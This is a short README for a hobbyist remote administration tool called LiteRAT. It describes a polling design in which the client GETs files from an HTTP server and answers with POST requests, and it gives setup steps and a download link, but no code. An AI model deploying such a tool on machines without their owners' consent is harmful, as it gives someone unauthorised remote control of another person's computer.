# LiteRAT

A crappy RAT (Remote Administration Tool) i made.
(it asks the user like 3 times if they wanna run it)

non-full access, just works by sending POST requests to an HTTP server, that the program will constatnly GET files from.
host the files in the "HOST" file and edit the Server.txt to point to your HTTP server. (default is localhost)

https://bitbucket.org/SilicaAndPina/literat/downloads/LiteRATv1.1.zip